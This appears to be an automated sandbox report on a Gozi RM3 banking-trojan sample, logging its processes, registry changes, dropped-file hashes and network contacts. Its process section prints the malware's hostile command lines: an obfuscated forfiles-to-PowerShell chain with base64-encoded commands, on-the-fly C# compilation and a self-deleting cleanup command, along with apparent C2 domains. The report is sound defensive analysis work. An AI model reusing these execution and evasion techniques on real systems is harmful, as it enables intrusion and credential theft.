N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 2004 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 548 wrote to memory of 1612 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1316 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1316 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 1316 wrote to memory of 628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\forfiles.exe
PID 628 wrote to memory of 1744 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 628 wrote to memory of 1744 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 628 wrote to memory of 1744 N/A C:\Windows\system32\forfiles.exe C:\Windows\system32\cmd.exe
PID 1744 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1744 wrote to memory of 1768 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 1424 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 1424 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 1424 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 912 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 912 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 912 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1768 wrote to memory of 824 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1768 wrote to memory of 824 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1768 wrote to memory of 824 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 824 wrote to memory of 964 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 824 wrote to memory of 964 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 824 wrote to memory of 964 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1768 wrote to memory of 1712 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1768 wrote to memory of 1712 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1768 wrote to memory of 1712 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
PID 1712 wrote to memory of 1936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1712 wrote to memory of 1936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1712 wrote to memory of 1936 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1768 wrote to memory of 1252 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 2024 wrote to memory of 1252 N/A C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe C:\Windows\Explorer.EXE
PID 1468 wrote to memory of 240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1468 wrote to memory of 240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe
PID 1468 wrote to memory of 240 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\timeout.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe

"C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:548 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:548 CREDAT:734213 /prefetch:2

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\forfiles.exe

forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit" /p C:\Windows\system32 /s /m po*l.e*e

C:\Windows\system32\cmd.exe

/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA== & exit

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAUwBlAGMAdQByAGkAdAB5AGMAYQBjAGgAZQAnACkALgBMAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\j03_qgpn.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC9C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBC9B.tmp"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pibgysdr.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD57.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBD56.tmp"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C timeout /t 5 && del "C:\USERS\ADMIN\APPDATA\LOCAL\TEMP\XQBTVE.EXE"

C:\Windows\system32\timeout.exe

timeout /t 5

Network

Country Destination Domain Proto
US 8.8.8.8:53 gogojoob.xyz udp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
NL 194.104.136.213:443 gogojoob.xyz tcp
DE 46.20.35.116:443 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
US 209.141.45.189:80 209.141.45.189 tcp
US 199.249.230.69:80 199.249.230.69 tcp
JP 172.104.79.222:80 172.104.79.222 tcp
FR 163.172.139.104:8080 163.172.139.104 tcp
FR 62.210.137.233:443 62.210.137.233 tcp
ZA 160.119.249.240:80 160.119.249.240 tcp
HU 217.112.131.7:443 tcp
US 199.249.230.117:80 199.249.230.117 tcp
PL 37.28.154.68:80 37.28.154.68 tcp
NL 212.83.167.220:9030 212.83.167.220 tcp
HK 91.245.255.40:80 91.245.255.40 tcp
US 74.91.21.2:80 74.91.21.2 tcp
ZA 160.119.249.240:80 tcp
PL 37.28.154.68:80 tcp
US 209.141.45.189:80 tcp
US 8.8.8.8:53 unavas.xyz udp
US 8.8.8.8:53 microsoft.com udp
NL 91.242.229.120:443 unavas.xyz tcp

Files

memory/2024-54-0x000000000032E000-0x0000000000339000-memory.dmp

memory/2024-55-0x000000000032E000-0x0000000000339000-memory.dmp

memory/2024-56-0x00000000002A0000-0x00000000002AC000-memory.dmp

memory/2024-57-0x0000000075AD1000-0x0000000075AD3000-memory.dmp

memory/2024-58-0x0000000001000000-0x000000000106F000-memory.dmp

memory/2024-59-0x00000000002B0000-0x00000000002C0000-memory.dmp

memory/2024-65-0x00000000002E0000-0x00000000002E2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0dc390d341fe24e223448026bf2e64f2
SHA1 98da1fd3e68d5dca28ea979825ca0ead1790d3e1
SHA256 aa5f122ead47f021ecbb021c399d106c6d4a0f64d88043ca41121339d654ee76
SHA512 5418076a73e19b22f6a4ab598749408a21334627d36c7b5d9d81dbc05976042084c38cc1340d8633897674da865a57e39542f12ac2174af16c5eb371374f22dd

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\shpg9mq\imagestore.dat

MD5 cf1efd3d28139752aa4fd2a1693c54ba
SHA1 a901e82eb24c32e816ef213e3e6afae0b1a23276
SHA256 26075673cf6a6b64433c3c44f292768f564dde54c84dbb4d1a100704aab3a4b2
SHA512 949d6aa320ea0182b12b9bfab8c6c0c2f6884d84d3b706f06e3cf78f86175abc2ae13ab26789fcaf31afc12d269e0ced3167e580cb9e63440d29d0d65bc83ec2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 d7c3b0b56abfbe1251654e19d60e1114
SHA1 b29ed29f822db04f1e4465d1fa607e915d46e325
SHA256 d53e67ad5ad31f518f8a36995b6b59a9b1b3a35dcf08487d04dc94b56800556d
SHA512 5dd88c5680e929afa3d9b9c28ac50d1243f75144d8f0dd45bbd0596ca29648201ab6dbd90d7f198749411c7d2d6563ffd5269b340a0591503ed4866475c0c4e2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 54e9306f95f32e50ccd58af19753d929
SHA1 eab9457321f34d4dcf7d4a0ac83edc9131bf7c57
SHA256 45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72
SHA512 8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\shpg9mq\imagestore.dat

MD5 2450639cae14cfd08c9a120a71863186
SHA1 2111b7cff797064f84a7d81287adfad2ef08eb98
SHA256 a98327b5743ef1531c6b762cf5447328789e5f4891a7f721f9376b8b34a409e8
SHA512 809265b4a43670a0a6fae28c483ff178b81132877502f6755a169e364ede16e0ce7c1079352be13195fa2ef1d12cb70e34b49217ffed94414c820fa99495ae3f

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GC0VJYYE\favicon[1].ico

MD5 a976d227e5d1dcf62f5f7e623211dd1b
SHA1 a2a9dc1abdd3d888484678663928cb024c359ee6
SHA256 66332859bd8e3441a019e073a318b62a47014ba244121301034b510dc7532271
SHA512 6754d545f2ce095cfa1fa7ca9e3223f89e37726ee7e541ebcf3e209e18b2602f3be8677598cb30d697327a63de032c11dbf8ef7ad7889a79c488a21044c1cb3f

memory/1768-72-0x000007FEFB8B1000-0x000007FEFB8B3000-memory.dmp

memory/1768-73-0x000007FEF2FF0000-0x000007FEF3B4D000-memory.dmp

memory/1768-74-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1768-75-0x0000000002560000-0x0000000002562000-memory.dmp

memory/1768-76-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1768-77-0x0000000002562000-0x0000000002564000-memory.dmp

memory/1768-78-0x0000000002564000-0x0000000002567000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fd6dce136410885dc40a136979bbad5f
SHA1 4c34ec4adf9ac13acc62cb41a722e016fa192a15
SHA256 7fd82ede2f92873334898c0dc1bf3cdb3377c53efa187d627933b0b702d5ebd0
SHA512 b24051cbd7613ec58ca155191ca7012d5a5ab94123e9ba516bf72a6930e5d7c524210e9f93b5b8f695ed40938c4548a3468bae35b41a53e7b6d6e9d3214ebbd9

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1424-82-0x000007FEF2FF0000-0x000007FEF3B4D000-memory.dmp

memory/1768-83-0x000000000256B000-0x000000000258A000-memory.dmp

memory/1424-84-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1424-85-0x0000000002640000-0x0000000002642000-memory.dmp

memory/1424-88-0x0000000002644000-0x0000000002647000-memory.dmp

memory/1424-87-0x0000000002642000-0x0000000002644000-memory.dmp

memory/1424-86-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1424-89-0x000000000264B000-0x000000000266A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 fd6dce136410885dc40a136979bbad5f
SHA1 4c34ec4adf9ac13acc62cb41a722e016fa192a15
SHA256 7fd82ede2f92873334898c0dc1bf3cdb3377c53efa187d627933b0b702d5ebd0
SHA512 b24051cbd7613ec58ca155191ca7012d5a5ab94123e9ba516bf72a6930e5d7c524210e9f93b5b8f695ed40938c4548a3468bae35b41a53e7b6d6e9d3214ebbd9

memory/912-92-0x000007FEF2FF0000-0x000007FEF3B4D000-memory.dmp

memory/912-94-0x00000000022BB000-0x00000000022DA000-memory.dmp

memory/912-95-0x00000000022B0000-0x00000000022B2000-memory.dmp

memory/912-93-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/912-96-0x00000000022B4000-0x00000000022B7000-memory.dmp

memory/912-97-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\j03_qgpn.cmdline

MD5 52ae97d8db8195ec9174097354fa51e0
SHA1 c552e470165fe986cfa61d978e58207860e684f5
SHA256 443ce39cd531b3800f3ded71f6bd30707ac82314ff945d2719b2a64ea76b6e9d
SHA512 f836ab1a07ad87ecfdf8c875df06857c418cd9a5009a2907d114e0f9a7b27679b22e91edd1099a5c86df9f05e30919129e9c6c5c43a5fbafcd0aab469ea25626

\??\c:\Users\Admin\AppData\Local\Temp\j03_qgpn.0.cs

MD5 7fceb996f934e8bda687cdd2bd46a9a7
SHA1 81e1edbcca6438daaccc3845fa0e3b1a6cff17a6
SHA256 fa53f8174510a9ad008973d47798f022b681e1764a15134efd2004980f23bb6e
SHA512 6aa6253527b72c0605859180887ff19cd96412cb816ec02e832d4a0e0cbcd03d9cc580112e4e2055d4a9ede850c1a339df974371f992b0b9b73e54e137610205

\??\c:\Users\Admin\AppData\Local\Temp\CSCBC9B.tmp

MD5 40177ccd1a66de5ab0e030d0f44430c0
SHA1 691613dfbd5c4d9678530fedbb8166ac3b3e8215
SHA256 7eaef959e419733567e22ff233c6fcf6183de64859a442e33de78794ebc46d4d
SHA512 b3736fb7a7a8e46b8bf31b2ed9f2b23e8fd2b50ee8a13734974284eb78be0b1924dce858531c9420bac7aa3486de32fc072c17e6600f141d07fc1d5c763cd455

C:\Users\Admin\AppData\Local\Temp\RESBC9C.tmp

MD5 7b00532fa05105a805cfb4f8f8933ea1
SHA1 d4dd4a2bc4ccd79d104e809bb53a42d75e3776d9
SHA256 8eb148d69ae1b59f141ba027a2105ed1b056aa41b1e70eb211351bfcf5a68b87
SHA512 b30e1a74b4f0e2eeb1e894588ef1d555267f8599d887ab17b5bdd78f8d54af036616190305c1a002390026a5214828cf5d56d35ae12089aa1dcc2fb54f138ad0

C:\Users\Admin\AppData\Local\Temp\j03_qgpn.dll

MD5 79400ec8319b067372b88020c6c2022d
SHA1 a2c132c2814cc44e8803a3290c7528b578e9ae6b
SHA256 e1fa68f85ec1dd315e0e15c8af6a9e92f469bb440894047f85bbd8ed1fa713c8
SHA512 9599e35f6fe4c28979d4add9358c08e2d98c8f2b30b716fe65b65fa8070e4d288e8ae85664012ce5174e581ab5dd3be17146df8429f8b3fe752e8aef0350c8fa

C:\Users\Admin\AppData\Local\Temp\j03_qgpn.pdb

MD5 84e44dcf3c0940014ffdfe6fd2d0cb6b
SHA1 fedd109ba5916dd9d13a70d06b9ebe974bdf54ca
SHA256 ecb2f60dae258f1385c08320a104c2065e926d181bac7754dbda4606ce59c9ab
SHA512 1349296815bd2ab99173659b5494488e71daf3c67238a0a22e0b124781a18ce6d43b31174cf63fa1d5afb808ea8bc3c181344dca3fb138cd14c3894ca6634750

\??\c:\Users\Admin\AppData\Local\Temp\pibgysdr.cmdline

MD5 66b725cf7a42ce333922974944e65039
SHA1 b29c15a3c02aa3d47eda5ad5aaf76a243198e530
SHA256 5a6e6bbe9699569f17dca040e661955fe5804e1515be5325e7f4220f6aa746cb
SHA512 248b42f4a661066df49fd5e78884216a492087358a311df6e6a3c9376f0db4d8b590bc9a88ecaffa2e7b2b5b0bafe9f477d09fb71178806dc1fdc5b11c9d188b

\??\c:\Users\Admin\AppData\Local\Temp\pibgysdr.0.cs

MD5 697f16b8c6892082559d8a17db343865
SHA1 246d6ba1419478be7915e78b61525da894321fb9
SHA256 518ab091348dea4f49183958185b3d42b5ddb191007bab25b6e69ff6ec923f1f
SHA512 801a428c5dd5ff4a745923914505dcf5a9929b3dbfc5bb5f6320996ad849fa42dc75ac53a432dd01103e0d6db2269583351f14b189a76a066d6f940ff79d38d6

\??\c:\Users\Admin\AppData\Local\Temp\CSCBD56.tmp

MD5 1b322f5f9b3a7223373dcf894f2f3b48
SHA1 072a91843fac450049df5f0b8bf0e8e716c420b5
SHA256 230f9ccc9554054e0a8d6cc7fab38a0a312f81b4cc5d612da7340893354c7536
SHA512 8f0818b75c37b39a864467c7013fb91ee482c8ede469b84ade89b6656519a667da48365717bf0366e1f214014739045975d06d8834d436e993924cc5fcf1754d

C:\Users\Admin\AppData\Local\Temp\RESBD57.tmp

MD5 4fa25d79da543ced2771d74f7ccd6f1c
SHA1 6a528e507ab0ae38a00a71a3d83272b513d6b499
SHA256 ff2897e0f0c8e9f7e471573d1cfaa5496b843c73c0a19906cdf4b055c53acb49
SHA512 0feede89eb009285e05945e10b3d57aee68a2181c58cf800e602a72e645006108d2beff1e9b70e2b4a39581bdece8fb4c99a33d2801a6d68eca9d6c90ebf753e

C:\Users\Admin\AppData\Local\Temp\pibgysdr.dll

MD5 d65d523cec5c44072a8ed33813c00c0b
SHA1 954c941ac9f57a9bee3bbcbd68531bfd6a2a507c
SHA256 a398e50b9b9b882e1730912534c50d4e7b66a6900bd2303f9c8f37bad8961da3
SHA512 9e4b9d594a8621618cf159a6d2ddf34fb5a81ba08ea7304c1bd96252ed1305aa396a7019f612239564405ae9b8e6b3a04c4a69143ba329231499c29815b987a6

C:\Users\Admin\AppData\Local\Temp\pibgysdr.pdb

MD5 84dcf2819a2a312c742efac7db24fbb1
SHA1 1dfb3e8b00d8bbae5edb677c5eed4801d361c8c2
SHA256 0246702823b43bda9a99b790304f7ac12153c39cf7765c8f487f853ef3645b1f
SHA512 fa4f4755bea71c1e774d542dc7421f6262cedc5655eb265df3b7ca652802001f332544661e57c6f0772bb17c953eb7eafef7d360c266b930f28d07a25f26a3b8

memory/1768-110-0x000000001B660000-0x000000001B673000-memory.dmp

memory/2024-111-0x00000000002E0000-0x00000000002FA000-memory.dmp

memory/1252-112-0x0000000002AB0000-0x0000000002AC5000-memory.dmp

memory/1252-113-0x0000000002A90000-0x0000000002AA5000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-15 10:24

Reported

2022-03-15 10:27

Platform

win10v2004-20220310-en

Max time kernel

158s

Max time network

170s

Command Line

"C:\Users\Admin\AppData\Local\Temp\XqBTvE.exe"

Signatures

Gozi RM3

banker trojan gozi_rm3

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2015545887" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\MINIE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\PendingDelete C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947423" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2016326912" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30947423" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A76BC3D4-A452-11EC-B9E2-DEEE83322A32}.dat = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{A76BC3D2-A452-11EC-B9E2-DEEE83322A32} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
